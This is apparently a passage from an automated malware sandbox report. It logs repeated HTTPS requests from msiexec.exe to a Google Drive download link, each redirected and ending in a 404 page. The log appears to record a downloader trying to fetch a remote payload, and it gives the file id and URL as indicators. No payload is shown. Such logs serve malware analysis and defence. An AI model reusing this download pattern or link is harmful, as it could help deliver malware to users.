                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy: script-src 'nonce-ejXqSIwE6xFF7rTC1_CalA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Content-Length: 1652
                                                                            X-GUploader-UploadID: AFiumC6uaC23Ma87UXoh5ekwYA0hY1YFZdrpS8UJd3mIwLOBoZTS811bIJMxthX9xKGLVyexoErtes0QzQ
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                            Connection: close
                                                                            2024-12-03 15:44:09 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 51 45 50 55 5f 52 4a 4d 6a 6d 51 30 76 6a 2d 5a 76 70 65 6b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xQEPU_RJMjmQ0vj-ZvpekQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.949718172.217.19.1744434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:44:11 UTC418OUTGET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: drive.google.com
                                                                            Cache-Control: no-cache
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:44:12 UTC1920INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:44:12 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy: script-src 'nonce-F59ITLjwZL2m3ZieyE9NWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.949719142.250.181.14434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:44:14 UTC460OUTGET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Cache-Control: no-cache
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:44:15 UTC1854INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:44:14 GMT
                                                                            Content-Security-Policy: script-src 'nonce-V5Ij825rmG2bwoh83j-dNQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Content-Length: 1652
                                                                            X-GUploader-UploadID: AFiumC446h0B54JEKRl6s_XXFGV2nxauNGZgaI2Past7Bhj_e71JAiseBFgNJPtSM-tYnulggu5z_hNrHA
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                            Connection: close
                                                                            2024-12-03 15:44:15 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 54 66 34 71 55 33 7a 63 57 57 4c 49 5a 53 78 4e 76 6f 4b 63 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="eTf4qU3zcWWLIZSxNvoKcg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.949720172.217.19.1744434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:44:17 UTC418OUTGET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: drive.google.com
                                                                            Cache-Control: no-cache
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:44:17 UTC1920INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:44:17 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy: script-src 'nonce-Wn2iPG0EvXutY33bFqzbdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            11192.168.2.949721142.250.181.14434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:44:19 UTC460OUTGET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Cache-Control: no-cache
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:44:20 UTC1854INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:44:20 GMT
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy: script-src 'nonce-rlOwPRkDZBH0TkiNGCdZtw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Content-Length: 1652
                                                                            X-GUploader-UploadID: AFiumC4cghIbPf3v61Nm6YOYT51i1FWU0xnwAdgZco3ZcxE6ALyNXzd4yvSzToemjc3PPQrb-FvG32cYmQ
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                            Connection: close
                                                                            2024-12-03 15:44:20 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 4d 52 50 76 48 6e 69 75 48 61 5a 4b 4b 68 48 78 75 64 55 59 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GMRPvHniuHaZKKhHxudUYw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.2.949723172.217.19.1744434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:44:22 UTC418OUTGET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: drive.google.com
                                                                            Cache-Control: no-cache
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:44:23 UTC1920INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:44:23 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy: script-src 'nonce-_dxqKyZDWyfXS-DnfI5MMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.2.949725142.250.181.14434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:44:25 UTC460OUTGET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Cache-Control: no-cache
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:44:26 UTC1854INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:44:25 GMT
                                                                            Content-Security-Policy: script-src 'nonce-MmCWXCiBn911DADyFXUfwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Content-Length: 1652
                                                                            X-GUploader-UploadID: AFiumC54h9p9IrBpDuPfnACo7yUfpSsxQZL_qcJgTpO7yZtlqm-MKYBc2wItF4ucy4Z2P60eWml95GXazg
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                            Connection: close
                                                                            2024-12-03 15:44:26 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 73 4c 49 63 54 63 69 4f 7a 52 61 31 32 46 38 72 68 69 6a 53 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1sLIcTciOzRa12F8rhijSQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            14192.168.2.949726172.217.19.1744434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:44:28 UTC418OUTGET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: drive.google.com
                                                                            Cache-Control: no-cache
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:44:29 UTC1920INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:44:28 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Content-Security-Policy: script-src 'nonce-nk68NQvqjrTrFiV2ybweRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Server: ESF
                                                                            Content-Length: 0
